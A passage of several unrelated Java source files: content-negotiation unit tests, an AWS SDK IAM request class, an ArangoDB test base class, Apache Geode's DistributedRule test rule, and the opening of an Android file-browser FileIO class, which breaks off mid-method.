negotiate(); checkNegotiation( result, true, ContentNegotiator.DEFAULT_MEDIA_TYPE, ContentNegotiator.DEFAULT_CHARACTER_ENCODING, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(2)); } @Test public void negotiationEnrichesMissingAttributesWithDefiniteValues() throws Exception { NegotiationResult result = baseNegotiator(). accept("text/*;q=0.2"). accept("*/*;q=1.0"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"). acceptCharset("us-ascii;q=0.1"). acceptCharset("utf-8;q=0.5"). support(TEXT_HTML). support(POSTSCRIPT). support(ENGLISH). support(FRENCH). negotiate(); checkNegotiation( result, true, POSTSCRIPT, UTF_8, ENGLISH, Optional.of(Quality.Type.SPECULATIVE), null, Optional.of(4)); } @Test public void negotiatesWithPredefinedAlternatives() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(Variants.builder().type(TEXT_HTML).language(ENGLISH).alternative(0.9D)). support(Variants.builder().type(TEXT_HTML).language(FRENCH).alternative(0.7D)). support(Variants.builder().type(POSTSCRIPT).language(ENGLISH).alternative(1.0D)). negotiate(); checkNegotiation( result, true, TEXT_HTML, null, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(3)); } @Test public void doesNotAddContentLanguageHeaderIfNotAvailable() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(Variants.builder().type(TEXT_HTML).alternative(0.7D)). support(Variants.builder().type(POSTSCRIPT).alternative(1.0D)). negotiate(); checkNegotiation( result, true, TEXT_HTML, null, null, Optional.of(Quality.Type.DEFINITE), null, Optional.of(2)); assertThat(result.responseHeaders(true).containsKey(ContentNegotiation.CONTENT_LANGUAGE),equalTo(false)); } @Test public void failsNegotiationIfCannotFindAlternative() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(Variants.builder().type(TEXT_HTML).language(GERMAN).alternative(0.7D)). 
support(Variants.builder().type(POSTSCRIPT).language(GERMAN).alternative(1.0D)). negotiate(); checkNegotiation( result, false, null, null, null, null, null, Optional.of(2)); } @Test public void negotiatesCharsetsOnlyRequirements() throws Exception { NegotiationResult result = baseNegotiator(). support(UTF_8). support(US_ASCII). support(ISO_8859_1). acceptCharset("utf-8;q=0.3"). acceptCharset("iso-8859-1;q=0.5"). acceptCharset("*;q=0.8"). negotiate(); checkNegotiation( result, true, ContentNegotiator.DEFAULT_MEDIA_TYPE, ISO_8859_1, ContentNegotiator.DEFAULT_LANGUAGE, Optional.of(Quality.Type.DEFINITE), null, Optional.of(3)); } @Test public void negotiatesWithoutMediaTypeAlternatives() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(Variants.builder().language(FRENCH).alternative(0.7D)). support(Variants.builder().language(ENGLISH).alternative(1.0D)). negotiate(); checkNegotiation( result, true, null, null, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(2)); } @Test public void ignoresNullAsSupportedMediaTypes() throws Exception { checkCannotNegotiate( specRequirementsNegotiator(). support((MediaType)null)); } @Test public void ignoresNullAsSupportedCharacterEncoding() throws Exception { checkCannotNegotiate( specRequirementsNegotiator(). support((CharacterEncoding)null)); } @Test public void ignoresNullAsSupportedLanguage() throws Exception { checkCannotNegotiate( specRequirementsNegotiator(). support((Language)null)); } @Test public void ignoresNullAsSupportedAlternative() throws Exception { checkCannotNegotiate( specRequirementsNegotiator(). 
support((Alternative)null)); } @Test public void defaultErrorVariantHasDefaultValues() throws Exception { checkDefaultErrorVariant(ContentNegotiator.newInstance().onError()); } @Test public void canChangeErrorVariant() throws Exception { Variant original = ImmutableVariant.newInstance().type(POSTSCRIPT).charset(ISO_8859_1).language(GERMAN); final ContentNegotiator sut = ContentNegotiator.newInstance().onError(original); final Variant variant = sut.onError(); assertThat(variant.type(),equalTo(original.type())); assertThat(variant.charset(),equalTo(original.charset())); assertThat(variant.language(),equalTo(original.language())); } @Test public void changingErrorVariantToNullResultsInDefaultErrorVariant() throws Exception { Variant original = ImmutableVariant.newInstance().type(POSTSCRIPT).charset(ISO_8859_1).language(GERMAN); final ContentNegotiator sut = ContentNegotiator.newInstance().onError(original).onError(null); checkDefaultErrorVariant(sut.onError()); } private void checkCannotNegotiate(ContentNegotiator negotiator) { try { negotiator.negotiate(); fail("Should not be able to negotiate if no alternatives where defined"); } catch (CannotNegotiateException e) { } } private ContentNegotiator baseNegotiator() { return ContentNegotiator.newInstance(); } private ContentNegotiator specRequirementsNegotiator() { return baseNegotiator(). accept("text/html;q=1.0"). accept("*/*;q=0.8"). acceptLanguage("en;q=1.0"). 
acceptLanguage("fr;q=0.5"); } private void checkNegotiation( NegotiationResult negotiation, boolean accepted, MediaType type, CharacterEncoding charset, Language language, Optional<Type> qualityType, Optional<Double> qualityWeight, Optional<Integer> numberOfAlternatives) { dumpNegotiation(negotiation); assertThat(negotiation.isAcceptable(),equalTo(accepted)); if(accepted) { assertThat(negotiation.variant().type(),equalTo(type)); assertThat(negotiation.variant().charset(),equalTo(charset)); assertThat(negotiation.variant().language(),equalTo(language)); } else { assertThat(negotiation.variant(),nullValue()); assertThat(negotiation.quality(),nullValue()); } if(qualityWeight!=null) { assertThat(negotiation.quality().weight(),equalTo(qualityWeight.orNull())); } if(qualityType!=null) { assertThat(negotiation.quality().type(),equalTo(qualityType.orNull())); } if(numberOfAlternatives!=null) { assertThat(negotiation.alternatives().size(),equalTo(numberOfAlternatives.orNull())); } } private void dumpNegotiation(NegotiationResult negotiation) { System.out.println("Content negotiation ["+name.getMethodName()+"]:"); if(negotiation.isAcceptable()) { System.out.printf("- Acceptable (%s): %s%n",negotiation.quality(),negotiation.variant()); } else { System.out.printf("- Not acceptable%n"); } try { dumpAlternatives(negotiation.alternatives()); } catch (Exception e) { System.out.println("* Failed to dump alternatives: "); e.printStackTrace(System.out); } try { dumpHeaders(negotiation, true); } catch (Exception e) { System.out.println("* Failed to dump accepted headers: "); e.printStackTrace(System.out); } try { dumpHeaders(negotiation, false); } catch (Exception e) { System.out.println("* Failed to dump failed headers: "); e.printStackTrace(System.out); } System.out.println(); } private void dumpAlternatives(Alternatives alternatives) { System.out.println("- Alternatives:"); for(int i=0;i<alternatives.size();i++) { Alternative a=alternatives.alternative(i); Quality 
q=alternatives.quality(i); System.out.printf(" + %s %s%n",q,a); } } private void dumpHeaders(NegotiationResult result, boolean status) { System.out.printf("- %s response headers:%n",status?"Accepted":"Rejected"); Multimap<String,String> headers=result.responseHeaders(status); for(Entry<String, Collection<String>> entry:headers.asMap().entrySet()) { System.out.printf(" + %s: %s%n",entry.getKey(),Joiner.on(", ").join(entry.getValue())); } } private void checkDefaultErrorVariant(final Variant variant) { assertThat(variant.type(),equalTo(ContentNegotiator.DEFAULT_MEDIA_TYPE)); assertThat(variant.charset(),equalTo(ContentNegotiator.DEFAULT_CHARACTER_ENCODING)); assertThat(variant.language(),equalTo(ContentNegotiator.DEFAULT_LANGUAGE)); } }
/* * Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.identitymanagement.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.AmazonWebServiceRequest; /** * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/iam-2010-05-08/ListServerCertificateTags" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class ListServerCertificateTagsRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable { /** * <p> * The name of the IAM server certificate whose tags you want to see. * </p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string of * characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also include any of * the following characters: _+=,.@- * </p> */ private String serverCertificateName; /** * <p> * Use this parameter only when paginating results and only after you receive a response indicating that the results * are truncated. Set it to the value of the <code>Marker</code> element in the response that you received to * indicate where the next call should start. * </p> */ private String marker; /** * <p> * Use this only when paginating results to indicate the maximum number of items you want in the response. 
If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>. * </p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return fewer * results, even when there are more results available. In that case, the <code>IsTruncated</code> response element * returns <code>true</code>, and <code>Marker</code> contains a value to include in the subsequent call that tells * the service where to continue from. * </p> */ private Integer maxItems; /** * <p> * The name of the IAM server certificate whose tags you want to see. * </p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string of * characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also include any of * the following characters: _+=,.@- * </p> * * @param serverCertificateName * The name of the IAM server certificate whose tags you want to see.</p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string * of characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also * include any of the following characters: _+=,.@- */ public void setServerCertificateName(String serverCertificateName) { this.serverCertificateName = serverCertificateName; } /** * <p> * The name of the IAM server certificate whose tags you want to see. * </p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string of * characters consisting of upper and lowercase alphanumeric characters with no spaces. 
You can also include any of * the following characters: _+=,.@- * </p> * * @return The name of the IAM server certificate whose tags you want to see.</p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string * of characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also * include any of the following characters: _+=,.@- */ public String getServerCertificateName() { return this.serverCertificateName; } /** * <p> * The name of the IAM server certificate whose tags you want to see. * </p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string of * characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also include any of * the following characters: _+=,.@- * </p> * * @param serverCertificateName * The name of the IAM server certificate whose tags you want to see.</p> * <p> * This parameter allows (through its <a href="http://wikipedia.org/wiki/regex">regex pattern</a>) a string * of characters consisting of upper and lowercase alphanumeric characters with no spaces. You can also * include any of the following characters: _+=,.@- * @return Returns a reference to this object so that method calls can be chained together. */ public ListServerCertificateTagsRequest withServerCertificateName(String serverCertificateName) { setServerCertificateName(serverCertificateName); return this; } /** * <p> * Use this parameter only when paginating results and only after you receive a response indicating that the results * are truncated. Set it to the value of the <code>Marker</code> element in the response that you received to * indicate where the next call should start. * </p> * * @param marker * Use this parameter only when paginating results and only after you receive a response indicating that the * results are truncated. 
Set it to the value of the <code>Marker</code> element in the response that you * received to indicate where the next call should start. */ public void setMarker(String marker) { this.marker = marker; } /** * <p> * Use this parameter only when paginating results and only after you receive a response indicating that the results * are truncated. Set it to the value of the <code>Marker</code> element in the response that you received to * indicate where the next call should start. * </p> * * @return Use this parameter only when paginating results and only after you receive a response indicating that the * results are truncated. Set it to the value of the <code>Marker</code> element in the response that you * received to indicate where the next call should start. */ public String getMarker() { return this.marker; } /** * <p> * Use this parameter only when paginating results and only after you receive a response indicating that the results * are truncated. Set it to the value of the <code>Marker</code> element in the response that you received to * indicate where the next call should start. * </p> * * @param marker * Use this parameter only when paginating results and only after you receive a response indicating that the * results are truncated. Set it to the value of the <code>Marker</code> element in the response that you * received to indicate where the next call should start. * @return Returns a reference to this object so that method calls can be chained together. */ public ListServerCertificateTagsRequest withMarker(String marker) { setMarker(marker); return this; } /** * <p> * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>. * </p> * <p> * If you do not include this parameter, the number of items defaults to 100. 
Note that IAM might return fewer * results, even when there are more results available. In that case, the <code>IsTruncated</code> response element * returns <code>true</code>, and <code>Marker</code> contains a value to include in the subsequent call that tells * the service where to continue from. * </p> * * @param maxItems * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>.</p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return * fewer results, even when there are more results available. In that case, the <code>IsTruncated</code> * response element returns <code>true</code>, and <code>Marker</code> contains a value to include in the * subsequent call that tells the service where to continue from. */ public void setMaxItems(Integer maxItems) { this.maxItems = maxItems; } /** * <p> * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>. * </p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return fewer * results, even when there are more results available. In that case, the <code>IsTruncated</code> response element * returns <code>true</code>, and <code>Marker</code> contains a value to include in the subsequent call that tells * the service where to continue from. * </p> * * @return Use this only when paginating results to indicate the maximum number of items you want in the response. 
* If additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element * is <code>true</code>.</p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return * fewer results, even when there are more results available. In that case, the <code>IsTruncated</code> * response element returns <code>true</code>, and <code>Marker</code> contains a value to include in the * subsequent call that tells the service where to continue from. */ public Integer getMaxItems() { return this.maxItems; } /** * <p> * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>. * </p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return fewer * results, even when there are more results available. In that case, the <code>IsTruncated</code> response element * returns <code>true</code>, and <code>Marker</code> contains a value to include in the subsequent call that tells * the service where to continue from. * </p> * * @param maxItems * Use this only when paginating results to indicate the maximum number of items you want in the response. If * additional items exist beyond the maximum you specify, the <code>IsTruncated</code> response element is * <code>true</code>.</p> * <p> * If you do not include this parameter, the number of items defaults to 100. Note that IAM might return * fewer results, even when there are more results available. In that case, the <code>IsTruncated</code> * response element returns <code>true</code>, and <code>Marker</code> contains a value to include in the * subsequent call that tells the service where to continue from. * @return Returns a reference to this object so that method calls can be chained together. 
*/ public ListServerCertificateTagsRequest withMaxItems(Integer maxItems) { setMaxItems(maxItems); return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getServerCertificateName() != null) sb.append("ServerCertificateName: ").append(getServerCertificateName()).append(","); if (getMarker() != null) sb.append("Marker: ").append(getMarker()).append(","); if (getMaxItems() != null) sb.append("MaxItems: ").append(getMaxItems()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof ListServerCertificateTagsRequest == false) return false; ListServerCertificateTagsRequest other = (ListServerCertificateTagsRequest) obj; if (other.getServerCertificateName() == null ^ this.getServerCertificateName() == null) return false; if (other.getServerCertificateName() != null && other.getServerCertificateName().equals(this.getServerCertificateName()) == false) return false; if (other.getMarker() == null ^ this.getMarker() == null) return false; if (other.getMarker() != null && other.getMarker().equals(this.getMarker()) == false) return false; if (other.getMaxItems() == null ^ this.getMaxItems() == null) return false; if (other.getMaxItems() != null && other.getMaxItems().equals(this.getMaxItems()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getServerCertificateName() == null) ? 0 : getServerCertificateName().hashCode()); hashCode = prime * hashCode + ((getMarker() == null) ? 
0 : getMarker().hashCode()); hashCode = prime * hashCode + ((getMaxItems() == null) ? 0 : getMaxItems().hashCode()); return hashCode; } @Override public ListServerCertificateTagsRequest clone() { return (ListServerCertificateTagsRequest) super.clone(); } }
package com.arangodb.blueprints.batch.test;

import java.util.Iterator;

import org.junit.After;
import org.junit.Before;

import com.arangodb.ArangoException;
import com.arangodb.blueprints.ArangoDBEdge;
import com.arangodb.blueprints.ArangoDBGraph;
import com.arangodb.blueprints.ArangoDBVertex;
import com.arangodb.blueprints.client.ArangoDBConfiguration;
import com.arangodb.blueprints.client.ArangoDBSimpleGraphClient;
import com.arangodb.entity.GraphEntity;
import com.tinkerpop.blueprints.Element;

/**
 * Base class for ArangoDB batch-graph tests. Provides a client, a shared set of
 * test collection/graph names, and helpers to clean up and inspect graph elements.
 */
public abstract class ArangoDBBatchTestCase {

    /**
     * the client
     */
    protected ArangoDBSimpleGraphClient tmpClient;

    /**
     * the configuration
     */
    protected ArangoDBConfiguration configuration;

    /**
     * name of the test graph
     */
    protected final String graphName = "test_batch_graph1";

    /**
     * name of the test vertex collection
     */
    protected final String vertices = "test_batch_vertices1";

    /**
     * name of the test edge collection
     */
    protected final String edges = "test_batch_edges1";

    /**
     * Deletes a graph in ArangoDB, ignoring failures (the graph may not exist).
     *
     * @param name
     *            the name of the graph
     */
    protected void deleteGraph(String name) {
        try {
            tmpClient.getDriver().deleteGraph(name);
        } catch (ArangoException ignored) {
            // best effort: the graph may not exist yet
        }
    }

    /**
     * Checks whether a graph with the given name exists.
     *
     * @param name
     *            the name of the graph
     * @return true if the graph was found
     */
    protected boolean hasGraph(String name) {
        try {
            GraphEntity graph = tmpClient.getDriver().getGraph(name);
            return graph != null;
        } catch (Exception ignored) {
            // lookup failure is treated the same as "not found"
            return false;
        }
    }

    /**
     * Deletes a collection in ArangoDB, ignoring failures (it may not exist).
     *
     * @param name
     *            the name of the collection
     */
    protected void deleteCollection(String name) {
        try {
            tmpClient.getDriver().deleteCollection(name);
        } catch (ArangoException ignored) {
            // best effort: the collection may not exist yet
        }
    }

    /**
     * Checks the internal "_id" property of an ArangoDB vertex, edge or graph object.
     *
     * @param element
     *            the vertex, edge or graph object
     * @return true if the element carries a non-empty "_id" (or document key for graphs)
     */
    protected boolean has_id(Element element) {
        if (element == null) {
            return false;
        }
        // exact-class comparison on purpose (matches the original getClass().equals
        // semantics); subclasses deliberately do not match
        Class<?> type = element.getClass();
        if (type == ArangoDBVertex.class) {
            return ((ArangoDBVertex) element).getRaw().getProperty("_id") != null;
        }
        if (type == ArangoDBEdge.class) {
            return ((ArangoDBEdge) element).getRaw().getProperty("_id") != null;
        }
        if (type == ArangoDBGraph.class) {
            return ((ArangoDBGraph) element).getRawGraph().getGraphEntity().getDocumentKey() != null;
        }
        return false;
    }

    /**
     * Checks a property of an ArangoDB vertex or edge object against an expected value.
     *
     * @param element
     *            the vertex or edge object
     * @param key
     *            the property name
     * @param expects
     *            the expected value of the property
     * @return true if the element's property equals the expected value
     */
    protected boolean hasProperty(Element element, String key, Object expects) {
        if (element == null) {
            return false;
        }
        Class<?> type = element.getClass();
        if (type == ArangoDBVertex.class) {
            return expects.equals(((ArangoDBVertex) element).getProperty(key));
        }
        if (type == ArangoDBEdge.class) {
            return expects.equals(((ArangoDBEdge) element).getProperty(key));
        }
        // graph objects carry no user properties; they always report false
        return false;
    }

    /**
     * Counts the number of elements produced by an iterator (consuming it).
     *
     * @param iter
     *            the iterator
     * @return the number of elements, or -1 when iter == null
     */
    protected int countElements(Iterator<?> iter) {
        if (iter == null) {
            return -1;
        }
        int total = 0;
        for (; iter.hasNext(); iter.next()) {
            total++;
        }
        return total;
    }

    /**
     * Counts the number of elements of an iterable (consuming its iterator).
     *
     * @param iterable
     *            the iterable
     * @return the number of elements
     */
    protected int countElements(Iterable<?> iterable) {
        return countElements(iterable.iterator());
    }

    @Before
    public void setUp() {
        // host name and port see: arangodb.properties
        configuration = new ArangoDBConfiguration();
        tmpClient = new ArangoDBSimpleGraphClient(configuration);
        // remove the test graph, then the test collections, so each test starts clean
        deleteGraph(graphName);
        deleteCollection(edges);
        deleteCollection(vertices);
    }

    @After
    public void tearDown() {
    }

}
/* * Licensed to the Apache Software Foundation (ASF) under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional information regarding * copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the License. You may obtain a * copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package org.apache.geode.test.dunit.rules; import static org.apache.geode.test.dunit.Disconnect.disconnectFromDS; import static org.apache.geode.test.dunit.DistributedTestUtils.unregisterInstantiatorsInThisVM; import static org.apache.geode.test.dunit.Invoke.invokeInEveryVM; import static org.apache.geode.test.dunit.Invoke.invokeInLocator; import static org.apache.geode.test.dunit.VM.DEFAULT_VM_COUNT; import static org.apache.geode.test.dunit.VM.getVM; import static org.assertj.core.api.Assertions.assertThat; import org.apache.geode.cache.query.QueryTestUtils; import org.apache.geode.cache.query.internal.QueryObserverHolder; import org.apache.geode.cache30.ClientServerTestCase; import org.apache.geode.cache30.RegionTestCase; import org.apache.geode.distributed.internal.DistributionConfig; import org.apache.geode.distributed.internal.DistributionMessageObserver; import org.apache.geode.distributed.internal.InternalDistributedSystem; import org.apache.geode.distributed.internal.tcpserver.TcpClient; import org.apache.geode.internal.admin.ClientStatsManager; import org.apache.geode.internal.cache.DiskStoreObserver; import org.apache.geode.internal.cache.InitialImageOperation; import 
org.apache.geode.internal.cache.tier.InternalClientMembership; import org.apache.geode.internal.cache.tier.sockets.CacheServerTestUtil; import org.apache.geode.internal.cache.tier.sockets.ClientProxyMembershipID; import org.apache.geode.internal.cache.tier.sockets.Message; import org.apache.geode.internal.cache.xmlcache.CacheCreation; import org.apache.geode.internal.net.SocketCreator; import org.apache.geode.internal.net.SocketCreatorFactory; import org.apache.geode.management.internal.cli.LogWrapper; import org.apache.geode.pdx.internal.TypeRegistry; import org.apache.geode.test.dunit.IgnoredException; import org.apache.geode.test.dunit.standalone.DUnitLauncher; import org.apache.geode.test.junit.rules.serializable.SerializableExternalResource; /** * JUnit Rule that launches DistributedTest VMs and scans all log output for suspect strings without * {@code DistributedTestCase}. The test class may need to implement {@code Serializable} if it * uses lambdas to perform {@code RMI} invocations on {@code VM}s. * * <p> * {@code DistributedRule} can be used in DistributedTests as a {@code Rule}. This will ensure * that checking for suspect strings is performed after each test method. * * <pre> * {@literal @}Rule * public DistributedRule distributedRule = new DistributedRule(); * * {@literal @}Test * public void shouldHaveFourVMsByDefault() { * assertThat(getVMCount()).isEqualTo(4); * } * </pre> * * <p> * You may specify a non-default number of {@code VM}s for the test when constructing * {@code DistributedRule}. 
* * <p> * Example of specifying fewer that the default number of {@code VM}s (which is 4): * * <pre> * {@literal @}Rule * public DistributedRule distributedRule = new DistributedRule(1); * * {@literal @}Test * public void hasOneVM() { * assertThat(getVMCount()).isEqualTo(1); * } * </pre> * * <p> * Example of specifying greater that the default number of {@code VM}s (which is 4): * * <pre> * {@literal @}Rule * public DistributedRule distributedRule = new DistributedRule(8); * * {@literal @}Test * public void hasEightVMs() { * assertThat(getVMCount()).isEqualTo(8); * } * </pre> * * <p> * {@code DistributedRule} can also be used in DistributedTests as a {@code ClassRule}. This ensures * that DUnit VMs will be available to non-Class {@code Rule}s. However, you may want to declare * {@code DistributedRule.TearDown} as a non-Class {@code Rule} so that check for suspect strings is * performed after each test method. * * <pre> * {@literal @}ClassRule * public static DistributedRule distributedRule = new DistributedRule(); * * {@literal @}Rule * public DistributedRule.TearDown distributedRuleTearDown = new DistributedRule.TearDown(); * * {@literal @}Test * public void shouldHaveFourDUnitVMsByDefault() { * assertThat(getVMCount()).isEqualTo(4); * } * </pre> */ @SuppressWarnings("unused") public class DistributedRule extends AbstractDistributedRule { private final int vmCount; /** * Use {@code Builder} for more options in constructing {@code DistributedRule}. */ public static Builder builder() { return new Builder(); } /** * Constructs DistributedRule and launches the default number of {@code VM}s (which is 4). */ public DistributedRule() { this(new Builder()); } /** * Constructs DistributedRule and launches the specified number of {@code VM}s. 
* * @param vmCount specified number of VMs */ public DistributedRule(final int vmCount) { this(new Builder().withVMCount(vmCount)); } DistributedRule(final Builder builder) { super(builder.vmCount); vmCount = builder.vmCount; } @Override protected void before() { DUnitLauncher.launchIfNeeded(vmCount); for (int i = 0; i < vmCount; i++) { assertThat(getVM(i)).isNotNull(); } } @Override protected void after() { TearDown.doTearDown(); } /** * Builds an instance of DistributedRule. */ public static class Builder { private int vmCount = DEFAULT_VM_COUNT; public Builder withVMCount(final int vmCount) { if (vmCount < 0) { throw new IllegalArgumentException("VM count must be positive integer"); } this.vmCount = vmCount; return this; } public DistributedRule build() { return new DistributedRule(this); } } /** * Cleans up horrendous things like static state and non-default instances in Geode. * * <p> * {@link DistributedRule#after()} invokes the same cleanup that this Rule does, but if you * defined {@code DistributedRule} as a {@code ClassRule} then you should declare TearDown * as a non-class {@code Rule} in your test: * * <pre> * {@literal @}ClassRule * public static DistributedRule distributedRule = new DistributedRule(); * * {@literal @}Rule * public DistributedRule.TearDown tearDownRule = new DistributedRule.TearDown(); * * {@literal @}Test * public void shouldHaveFourDUnitVMsByDefault() { * assertThat(getVMCount()).isEqualTo(4); * } * </pre> * * <p> * Note: {@link CacheRule} handles its own cleanup of Cache and Regions. */ public static class TearDown extends SerializableExternalResource { @Override protected void before() { // nothing } @Override protected void after() { doTearDown(); } static void doTearDown() { tearDownInVM(); invokeInEveryVM(() -> { tearDownInVM(); }); invokeInLocator(() -> { DistributionMessageObserver.setInstance(null); unregisterInstantiatorsInThisVM(); }); DUnitLauncher.closeAndCheckForSuspects(); } public static void tearDownInVM() { // 1. 
Please do NOT add to this list. I'm trying to DELETE this list. // 2. Instead, please add to the after() of your test or your rule. disconnectFromDS(); // keep alphabetized to detect duplicate lines CacheCreation.clearThreadLocals(); CacheServerTestUtil.clearCacheReference(); ClientProxyMembershipID.system = null; ClientServerTestCase.AUTO_LOAD_BALANCE = false; ClientStatsManager.cleanupForTests(); DiskStoreObserver.setInstance(null); unregisterInstantiatorsInThisVM(); DistributionMessageObserver.setInstance(null); InitialImageOperation.slowImageProcessing = 0; InternalClientMembership.unregisterAllListeners(); LogWrapper.close(); QueryObserverHolder.reset(); QueryTestUtils.setCache(null); RegionTestCase.preSnapshotRegion = null; SocketCreator.resetHostNameCache(); SocketCreator.resolve_dns = true; TcpClient.clearStaticData(); // clear system properties -- keep alphabetized System.clearProperty(DistributionConfig.GEMFIRE_PREFIX + "log-level"); System.clearProperty("jgroups.resolve_dns"); System.clearProperty(Message.MAX_MESSAGE_SIZE_PROPERTY); if (InternalDistributedSystem.systemAttemptingReconnect != null) { InternalDistributedSystem.systemAttemptingReconnect.stopReconnecting(); } IgnoredException.removeAllExpectedExceptions(); SocketCreatorFactory.close(); TypeRegistry.setPdxSerializer(null); TypeRegistry.init(); } } }
package com.aditya.filebrowser.fileoperations;

import android.app.ProgressDialog;
import android.content.Context;
import android.content.DialogInterface;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.net.Uri;
import android.os.Handler;
import android.support.v7.app.AlertDialog;

import com.aditya.filebrowser.Constants;
import com.aditya.filebrowser.NavigationHelper;
import com.aditya.filebrowser.R;
import com.aditya.filebrowser.utils.UIUpdateHelper;
import com.aditya.filebrowser.interfaces.IFuncPtr;
import com.aditya.filebrowser.models.FileItem;
import com.aditya.filebrowser.utils.UIUtils;

import org.apache.commons.io.FileUtils;

import java.io.File;
import java.io.IOException;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

/**
 * File-system operations (create/delete/paste/rename/properties/share) for the browser.
 *
 * <p>Each operation runs on a single-threaded {@link ExecutorService} so operations are
 * serialized, and posts UI updates (refresh, progress, errors) back through
 * {@code mUIUpdateHandler} via {@link UIUpdateHelper} runnables.
 *
 * <p>NOTE(review): the executor is never shut down; confirm the owner's lifecycle ties
 * this object's lifetime to the activity/process.
 *
 * Created by Aditya on 4/15/2017.
 */
public class FileIO {

    // single-threaded executor: file operations are serialized in submission order
    ExecutorService executor;
    // handler bound to the UI thread; all UI mutations are posted through it
    Handler mUIUpdateHandler;
    Context mContext;
    // builds the runnables (refresh/progress/error) posted to the UI thread
    UIUpdateHelper mHelper;
    NavigationHelper mNavigationHelper;

    public FileIO(NavigationHelper mNavigationHelper,Handler mUIUpdateHandler, Context mContext) {
        this.mUIUpdateHandler = mUIUpdateHandler;
        this.mContext = mContext;
        this.mNavigationHelper = mNavigationHelper;
        mHelper = new UIUpdateHelper(mNavigationHelper, mContext);
        executor = Executors.newFixedThreadPool(1);
    }

    /**
     * Creates {@code path} (including missing parents) on the worker thread, then refreshes
     * the UI. Shows a toast instead when the parent directory is not writable.
     */
    public void createDirectory(final File path) {
        if(path.getParentFile()!=null && path.getParentFile().canWrite()) {
            executor.execute(new Runnable() {
                @Override
                public void run() {
                    try {
                        FileUtils.forceMkdir(path);
                        mUIUpdateHandler.post(mHelper.updateRunner());
                    } catch (IOException e) {
                        e.printStackTrace();
                        mUIUpdateHandler.post(mHelper.errorRunner("An error occurred while creating a new folder"));
                    }
                }
            });
        } else {
            UIUtils.ShowToast("No Write Permission Granted",mContext);
        }
    }

    /**
     * Asks for confirmation, then deletes the selected files/directories on the worker
     * thread while updating a horizontal progress dialog per item. On error the progress
     * dialog is dismissed and an error message is shown; partial deletes are possible.
     */
    public void deleteItems(final List<FileItem> selectedItems) {
        if(selectedItems!=null && selectedItems.size()>0) {
            AlertDialog confirmDialog = new AlertDialog.Builder(mContext)
                    .setTitle("Delete Files")
                    .setMessage("Are you sure you want to delete " + selectedItems.size() + " items?")
                    .setPositiveButton(android.R.string.yes, new DialogInterface.OnClickListener() {
                        public void onClick(DialogInterface dialog, int which) {
                            // continue with delete
                            final ProgressDialog progressDialog = new ProgressDialog(mContext);
                            progressDialog.setTitle("Deleting Please Wait... ");
